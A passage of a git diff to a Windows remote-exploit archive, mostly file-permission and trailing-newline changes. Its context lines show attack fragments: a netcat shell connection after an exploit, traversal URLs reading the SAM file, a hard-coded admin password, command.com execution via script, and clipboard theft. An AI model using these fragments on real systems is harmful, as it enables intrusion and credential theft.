a/platforms/windows/remote/14385.html +++ b/platforms/windows/remote/14385.html @@ -40,7 +40,4 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> -</html> - - - \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/14416.html b/platforms/windows/remote/14416.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14447.html b/platforms/windows/remote/14447.html old mode 100755 new mode 100644 index a5df01493..d739dbf86 --- a/platforms/windows/remote/14447.html +++ b/platforms/windows/remote/14447.html @@ -29,6 +29,4 @@ function clickjack_armor(evt) <div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px"> <b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div> -</center></body></html> - - \ No newline at end of file +</center></body></html> \ No newline at end of file diff --git a/platforms/windows/remote/14492.c b/platforms/windows/remote/14492.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14505.html b/platforms/windows/remote/14505.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14514.html b/platforms/windows/remote/14514.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14519.html b/platforms/windows/remote/14519.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1452.pm b/platforms/windows/remote/1452.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14539.html b/platforms/windows/remote/14539.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14551.html b/platforms/windows/remote/14551.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14552.html b/platforms/windows/remote/14552.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14553.html b/platforms/windows/remote/14553.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1458.cpp b/platforms/windows/remote/1458.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14580.html b/platforms/windows/remote/14580.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14586.html b/platforms/windows/remote/14586.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14599.txt b/platforms/windows/remote/14599.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1460.pm b/platforms/windows/remote/1460.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14600.html b/platforms/windows/remote/14600.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14605.html b/platforms/windows/remote/14605.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1462.cpp b/platforms/windows/remote/1462.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1463.pm b/platforms/windows/remote/1463.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14658.txt b/platforms/windows/remote/14658.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14674.txt b/platforms/windows/remote/14674.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14856.txt b/platforms/windows/remote/14856.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14857.txt b/platforms/windows/remote/14857.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14878.html b/platforms/windows/remote/14878.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14885.html b/platforms/windows/remote/14885.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/149.c b/platforms/windows/remote/149.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15001.html b/platforms/windows/remote/15001.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1504.pm b/platforms/windows/remote/1504.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15048.txt b/platforms/windows/remote/15048.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1505.html b/platforms/windows/remote/1505.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1506.c b/platforms/windows/remote/1506.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15071.txt b/platforms/windows/remote/15071.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/151.txt b/platforms/windows/remote/151.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15235.html b/platforms/windows/remote/15235.html old mode 100755 new mode 100644 index 210dfb08d..582e122d5 --- a/platforms/windows/remote/15235.html +++ b/platforms/windows/remote/15235.html @@ -190,5 +190,4 @@ arg5="defaultV" target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4 ,arg5 </script> -</html> - \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/15241.txt b/platforms/windows/remote/15241.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15266.txt b/platforms/windows/remote/15266.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15288.txt b/platforms/windows/remote/15288.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15296.txt b/platforms/windows/remote/15296.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15333.txt b/platforms/windows/remote/15333.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15336.txt b/platforms/windows/remote/15336.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15347.py b/platforms/windows/remote/15347.py index ae565708a..3b2736bca 100755 --- a/platforms/windows/remote/15347.py +++ b/platforms/windows/remote/15347.py @@ -264,4 +264,4 @@ fileobj.write("POST /"+Request+"") # 025D2D3E push eax # 025D2D3F call @ILT+120575(_sscanf) (1AF7704h) # 025D2D44 add esp,10h -# 025D2D47 mov dword ptr [ebp-1FCh],eax \ No newline at end of file +# 025D2D47 mov dword ptr [ebp-1FCh],eax \ No newline at end of file diff --git a/platforms/windows/remote/15349.txt b/platforms/windows/remote/15349.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15352.html b/platforms/windows/remote/15352.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15357.php b/platforms/windows/remote/15357.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15358.txt b/platforms/windows/remote/15358.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1536.pm b/platforms/windows/remote/1536.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15368.php b/platforms/windows/remote/15368.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1537.pm b/platforms/windows/remote/1537.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15371.txt b/platforms/windows/remote/15371.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15373.txt b/platforms/windows/remote/15373.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15421.html b/platforms/windows/remote/15421.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15427.txt b/platforms/windows/remote/15427.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15437.txt b/platforms/windows/remote/15437.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15438.txt b/platforms/windows/remote/15438.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15445.txt b/platforms/windows/remote/15445.txt old mode 100755 new mode 100644 index 47d74a4ae..bc0e564fd --- a/platforms/windows/remote/15445.txt +++ b/platforms/windows/remote/15445.txt @@ -195,4 +195,4 @@ timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -root@voltron:/dotdotpwn-v2.1# \ No newline at end of file +root@voltron:/dotdotpwn-v2.1# \ No newline at end of file diff --git a/platforms/windows/remote/15450.txt b/platforms/windows/remote/15450.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/155.c b/platforms/windows/remote/155.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/156.c b/platforms/windows/remote/156.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15600.html b/platforms/windows/remote/15600.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15601.html b/platforms/windows/remote/15601.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15648.html b/platforms/windows/remote/15648.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15655.html b/platforms/windows/remote/15655.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15668.html b/platforms/windows/remote/15668.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/157.c b/platforms/windows/remote/157.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15733.html b/platforms/windows/remote/15733.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/158.c b/platforms/windows/remote/158.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15802.txt b/platforms/windows/remote/15802.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15809.html b/platforms/windows/remote/15809.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15861.txt b/platforms/windows/remote/15861.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15862.txt b/platforms/windows/remote/15862.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15866.html b/platforms/windows/remote/15866.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15869.txt b/platforms/windows/remote/15869.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15885.html b/platforms/windows/remote/15885.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/159.c b/platforms/windows/remote/159.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1592.c b/platforms/windows/remote/1592.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15957.py b/platforms/windows/remote/15957.py index 7d46abc87..4ef46f54c 100755 --- a/platforms/windows/remote/15957.py +++ b/platforms/windows/remote/15957.py @@ -100,4 +100,4 @@ data = s.recv(1024) print " [+] Closing connection.." s.close() -print " [+] Done!" \ No newline at end of file +print " [+] Done!" \ No newline at end of file diff --git a/platforms/windows/remote/15984.html b/platforms/windows/remote/15984.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/15991.html b/platforms/windows/remote/15991.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16014.html b/platforms/windows/remote/16014.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16052.txt b/platforms/windows/remote/16052.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16053.txt b/platforms/windows/remote/16053.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16055.txt b/platforms/windows/remote/16055.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16056.txt b/platforms/windows/remote/16056.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1606.html b/platforms/windows/remote/1606.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1607.cpp b/platforms/windows/remote/1607.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16075.pl b/platforms/windows/remote/16075.pl index 93bb2658e..c449e69e9 100755 --- a/platforms/windows/remote/16075.pl +++ b/platforms/windows/remote/16075.pl @@ -45,4 +45,4 @@ if (@ARGV < 3) { # #--------------------------------------------- #site : zt-security.com - colombohackers.com -#zero@zero-desktop:~/Desktop/exploit$ \ No newline at end of file +#zero@zero-desktop:~/Desktop/exploit$ \ No newline at end of file diff --git a/platforms/windows/remote/16105.txt b/platforms/windows/remote/16105.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1620.pm b/platforms/windows/remote/1620.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16242.html b/platforms/windows/remote/16242.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16259.txt b/platforms/windows/remote/16259.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1626.pm b/platforms/windows/remote/1626.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1628.cpp b/platforms/windows/remote/1628.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/164.c b/platforms/windows/remote/164.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/165.c b/platforms/windows/remote/165.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/168.c b/platforms/windows/remote/168.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1681.pm b/platforms/windows/remote/1681.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/16936.html b/platforms/windows/remote/16936.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17022.txt b/platforms/windows/remote/17022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17024.txt b/platforms/windows/remote/17024.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17053.txt b/platforms/windows/remote/17053.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17063.txt b/platforms/windows/remote/17063.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17104.txt b/platforms/windows/remote/17104.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17105.txt b/platforms/windows/remote/17105.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17156.txt b/platforms/windows/remote/17156.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17187.txt b/platforms/windows/remote/17187.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17240.html b/platforms/windows/remote/17240.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17243.txt b/platforms/windows/remote/17243.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17304.txt b/platforms/windows/remote/17304.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17328.html b/platforms/windows/remote/17328.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17359.pl b/platforms/windows/remote/17359.pl index 861f490df..bbb923d82 100755 --- a/platforms/windows/remote/17359.pl +++ b/platforms/windows/remote/17359.pl @@ -142,4 +142,4 @@ if ($socket = IO::Socket::INET->new else { print "[-] Connection to $target failed!\n"; - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/remote/17381.txt b/platforms/windows/remote/17381.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17416.html b/platforms/windows/remote/17416.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17419.zip b/platforms/windows/remote/17419.zip old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17438.txt b/platforms/windows/remote/17438.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17517.txt b/platforms/windows/remote/17517.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17550.py b/platforms/windows/remote/17550.py index 3d9ae219f..abccf2837 100755 --- a/platforms/windows/remote/17550.py +++ b/platforms/windows/remote/17550.py @@ -64,5 +64,4 @@ if __name__ == '__main__': host = sys.argv[1] port = sys.argv[2] sploit(host, int(port)) - os.system("nc " + host + " 4444") - \ No newline at end of file + os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/platforms/windows/remote/17557.html b/platforms/windows/remote/17557.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17575.txt b/platforms/windows/remote/17575.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17578.txt b/platforms/windows/remote/17578.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17581.txt b/platforms/windows/remote/17581.txt old mode 100755 new mode 100644 index 0b55359fa..ee56f2d5c --- a/platforms/windows/remote/17581.txt +++ b/platforms/windows/remote/17581.txt @@ -12,4 +12,4 @@ http://127.0.0.1/index.php. /html. #File Download http://IP:PORT/index.php. /html. http://127.0.0.1/index.php%20 #File Download -http://IP:PORT/index.php%20 \ No newline at end of file +http://IP:PORT/index.php%20 \ No newline at end of file diff --git a/platforms/windows/remote/17672.html b/platforms/windows/remote/17672.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1776.c b/platforms/windows/remote/1776.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1788.pm b/platforms/windows/remote/1788.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17974.html b/platforms/windows/remote/17974.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18016.txt b/platforms/windows/remote/18016.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18051.txt b/platforms/windows/remote/18051.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18062.txt b/platforms/windows/remote/18062.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18092.html b/platforms/windows/remote/18092.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18093.txt b/platforms/windows/remote/18093.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18138.txt b/platforms/windows/remote/18138.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18182.txt b/platforms/windows/remote/18182.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18187.c b/platforms/windows/remote/18187.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18189.txt b/platforms/windows/remote/18189.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18437.txt b/platforms/windows/remote/18437.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18531.html b/platforms/windows/remote/18531.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18542.txt b/platforms/windows/remote/18542.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18555.txt b/platforms/windows/remote/18555.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18621.txt b/platforms/windows/remote/18621.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18622.txt b/platforms/windows/remote/18622.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18623.txt b/platforms/windows/remote/18623.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18624.txt b/platforms/windows/remote/18624.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18625.txt b/platforms/windows/remote/18625.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18640.txt b/platforms/windows/remote/18640.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18672.txt b/platforms/windows/remote/18672.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18674.txt b/platforms/windows/remote/18674.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18703.txt b/platforms/windows/remote/18703.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18704.txt b/platforms/windows/remote/18704.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18718.txt b/platforms/windows/remote/18718.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/18805.txt b/platforms/windows/remote/18805.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/189.c b/platforms/windows/remote/189.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/190.c b/platforms/windows/remote/190.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19033.txt b/platforms/windows/remote/19033.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19083.cpp b/platforms/windows/remote/19083.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19094.txt b/platforms/windows/remote/19094.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19113.txt b/platforms/windows/remote/19113.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19147.txt b/platforms/windows/remote/19147.txt old mode 100755 new mode 100644 index 88d593d49..2c9235d4c --- a/platforms/windows/remote/19147.txt +++ b/platforms/windows/remote/19147.txt @@ -4,4 +4,4 @@ Web-based administration for IIS 4.0 is, by default, limited to the local loopba http://www.server.com/scripts/iisadmin/ism.dll?http/dir -This URL prompts the user for a username/password to access the remote administration console. Although approved access does not permit the user to commit changes to the IIS server, it may allow them to gather sensitive information about the web server and its configuration. \ No newline at end of file +This URL prompts the user for a username/password to access the remote administration console. Although approved access does not permit the user to commit changes to the IIS server, it may allow them to gather sensitive information about the web server and its configuration. \ No newline at end of file diff --git a/platforms/windows/remote/19149.c b/platforms/windows/remote/19149.c old mode 100755 new mode 100644 index 1baaf99ee..05daeacb7 --- a/platforms/windows/remote/19149.c +++ b/platforms/windows/remote/19149.c @@ -98,4 +98,4 @@ printf("\n%s\n\n",resp); closesocket(sock); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/1915.pm b/platforms/windows/remote/1915.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19152.txt b/platforms/windows/remote/19152.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19156.txt b/platforms/windows/remote/19156.txt old mode 100755 new mode 100644 index 842ec8248..d190e5875 --- a/platforms/windows/remote/19156.txt +++ b/platforms/windows/remote/19156.txt @@ -25,4 +25,4 @@ Window spoofing: http://horoznet.com/AlpSinan/webspoof.htm Cross-frame security circumvention -http://horoznet.com/AlpSinan/crossframe.htm \ No newline at end of file +http://horoznet.com/AlpSinan/crossframe.htm \ No newline at end of file diff --git a/platforms/windows/remote/19164.txt b/platforms/windows/remote/19164.txt old mode 100755 new mode 100644 index 2b1aea18a..4378e8780 --- a/platforms/windows/remote/19164.txt +++ b/platforms/windows/remote/19164.txt @@ -8,4 +8,4 @@ function GetClipBoard() { tb.paste(); // paste over the MS Forms 2.0 TextBox document.forms(0).S1.value=tb.text; // moves the text to the text area box -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/19197.txt b/platforms/windows/remote/19197.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19208.txt b/platforms/windows/remote/19208.txt old mode 100755 new mode 100644 index e445cd69e..b27d8661f --- a/platforms/windows/remote/19208.txt +++ b/platforms/windows/remote/19208.txt @@ -8,4 +8,4 @@ The URL below contains the syntax to view the SITE.CSC file in a default install http://sitename/adsamples/config/site.csc -A text editor may be used to view the contents of the SITE.CSC file. This file may contain the DSN, username, and password used to access the related SQL database. \ No newline at end of file +A text editor may be used to view the contents of the SITE.CSC file. This file may contain the DSN, username, and password used to access the related SQL database. \ No newline at end of file diff --git a/platforms/windows/remote/19224.c b/platforms/windows/remote/19224.c old mode 100755 new mode 100644 index 1cd78f35b..04a9b5daf --- a/platforms/windows/remote/19224.c +++ b/platforms/windows/remote/19224.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/281/info A vulnerability in Computalynx's CMail allows remote malicious users to steal local files. @@ -11,6 +12,7 @@ A number of buffer overflows in the processing of SMTP and POP commands also exi http://www.example.com:8002/../spool/username/mail.txt the buffer overflow vulnerability +*/ #define UNIX @@ -265,4 +267,4 @@ main (int argc, char *argv[]) #endif CLOSE(sock); exit(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/19239.txt b/platforms/windows/remote/19239.txt old mode 100755 new mode 100644 index 97c81b76a..cf0ae3f40 --- a/platforms/windows/remote/19239.txt +++ b/platforms/windows/remote/19239.txt @@ -7,4 +7,4 @@ The full physical path name for the IIS web server root directory may be obtaine will return: Error Performing Query -Error processing file 'c:\inetpub\scripts\samples\hackme.idc' \ No newline at end of file +Error processing file 'c:\inetpub\scripts\samples\hackme.idc' \ No newline at end of file diff --git a/platforms/windows/remote/19246.pm b/platforms/windows/remote/19246.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19248.c b/platforms/windows/remote/19248.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19361.txt b/platforms/windows/remote/19361.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1940.pm b/platforms/windows/remote/1940.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19435.html b/platforms/windows/remote/19435.html old mode 100755 new mode 100644 index 7f2cc33c8..9aedee811 --- a/platforms/windows/remote/19435.html +++ b/platforms/windows/remote/19435.html @@ -78,5 +78,4 @@ this here thingy to test==></FONT></FONT></FONT>&nbsp; window.open('/toto?s=76000007', '_geo_toto', 'width=515,height=125'); // --> </SCRIPT> -<!-- </SERVICE> --> - \ No newline at end of file +<!-- </SERVICE> --> \ No newline at end of file diff --git a/platforms/windows/remote/19442.html b/platforms/windows/remote/19442.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19448.c b/platforms/windows/remote/19448.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19449.c b/platforms/windows/remote/19449.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19450.c b/platforms/windows/remote/19450.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19468.txt b/platforms/windows/remote/19468.txt old mode 100755 new mode 100644 index 376d89cef..d5773018b --- a/platforms/windows/remote/19468.txt +++ b/platforms/windows/remote/19468.txt @@ -54,4 +54,4 @@ classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </script> -</p> \ No newline at end of file +</p> \ No newline at end of file diff --git a/platforms/windows/remote/19486.c b/platforms/windows/remote/19486.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19487.txt b/platforms/windows/remote/19487.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19490.txt b/platforms/windows/remote/19490.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19491.txt b/platforms/windows/remote/19491.txt old mode 100755 new mode 100644 index 22c2409a7..c8c41f0d1 --- a/platforms/windows/remote/19491.txt +++ b/platforms/windows/remote/19491.txt @@ -14,4 +14,4 @@ making the entire password: np7m4qM1M7VT<tab>= this password can be entered from the command line with quotation marks around it. -net use \\172.16.1.101\ipc$ "np7m4qM1M7VT =" /user:172.16.1.101\netectagentadmin$ \ No newline at end of file +net use \\172.16.1.101\ipc$ "np7m4qM1M7VT =" /user:172.16.1.101\netectagentadmin$ \ No newline at end of file diff --git a/platforms/windows/remote/19494.c b/platforms/windows/remote/19494.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19495.c b/platforms/windows/remote/19495.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19496.c b/platforms/windows/remote/19496.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19514.txt b/platforms/windows/remote/19514.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19515.txt b/platforms/windows/remote/19515.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19521.txt b/platforms/windows/remote/19521.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19530.txt b/platforms/windows/remote/19530.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19537.txt b/platforms/windows/remote/19537.txt old mode 100755 new mode 100644 index d383247f3..1bedfceb3 --- a/platforms/windows/remote/19537.txt +++ b/platforms/windows/remote/19537.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/689/info TeamTrack 3.00 has a built-in webserver which is meant to be used during the evaluation period, or until IIS or Netscape Enterprise/FastTrack is installed. This server does not filter out requested paths containing the ../ sequence. Because of this, an attacker can specify a file outside of the normal web file structure. The name and relative path (from the web root) of the file must be known by the attacker. Requesting the following URL from the TeamTrack server will display the contents of the target's SAM file: (NT only) -http ://target.com/../../../../../winnt/repair/sam._ \ No newline at end of file +http ://target.com/../../../../../winnt/repair/sam._ \ No newline at end of file diff --git a/platforms/windows/remote/19539.txt b/platforms/windows/remote/19539.txt old mode 100755 new mode 100644 index a70bbd603..10549eafe --- a/platforms/windows/remote/19539.txt +++ b/platforms/windows/remote/19539.txt @@ -14,4 +14,4 @@ document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(Str } setTimeout('f()',2000); </SCRIPT> -<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME> \ No newline at end of file +<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME> \ No newline at end of file diff --git a/platforms/windows/remote/19540.txt b/platforms/windows/remote/19540.txt old mode 100755 new mode 100644 index aa35bb366..57fdc7d07 --- a/platforms/windows/remote/19540.txt +++ b/platforms/windows/remote/19540.txt @@ -6,4 +6,4 @@ The Jana webserver is susceptible to directory traversal attacks using multiple http&nbsp;://target/./.././.././.././win.ini or -http&nbsp;://target/....../autoexec.bat \ No newline at end of file +http&nbsp;://target/....../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/19559.txt b/platforms/windows/remote/19559.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19561.c b/platforms/windows/remote/19561.c old mode 100755 new mode 100644 index 1ad1d94f9..633ca2019 --- a/platforms/windows/remote/19561.c +++ b/platforms/windows/remote/19561.c @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/730/info - -True North Software's Internet Anywhere Mail Server has various weaknesses that could allow an attacker to remotely crash the server running this software.. The POP3 commands "list", "retr" .uidl" and "user" and the SMTP command "vrfy", if sent with abnormally long arguments, will crash the server. These limits seem to be around 200 characters for the POP3 commands, and around 250 characters for the SMTP command. - -Currently, these problems have only been reliably remotely exploited as DoS attacks, however, it is conceivable that a remote shell exploit could be created. +// source: http://www.securityfocus.com/bid/730/info +// +// True North Software's Internet Anywhere Mail Server has various weaknesses that could allow an attacker to remotely crash the server running this software.. The POP3 commands "list", "retr" .uidl" and "user" and the SMTP command "vrfy", if sent with abnormally long arguments, will crash the server. These limits seem to be around 200 characters for the POP3 commands, and around 250 characters for the SMTP command. +// +// Currently, these problems have only been reliably remotely exploited as DoS attacks, however, it is conceivable that a remote shell exploit could be created. +// // iamexploit.c - by Arne Vidstrom - http://www.bahnhof.se/~winnt/ // diff --git a/platforms/windows/remote/19566.c b/platforms/windows/remote/19566.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19568.txt b/platforms/windows/remote/19568.txt old mode 100755 new mode 100644 index 34791b242..9a1eacd30 --- a/platforms/windows/remote/19568.txt +++ b/platforms/windows/remote/19568.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/746/info The URL Live! free webserver from Pacific software is 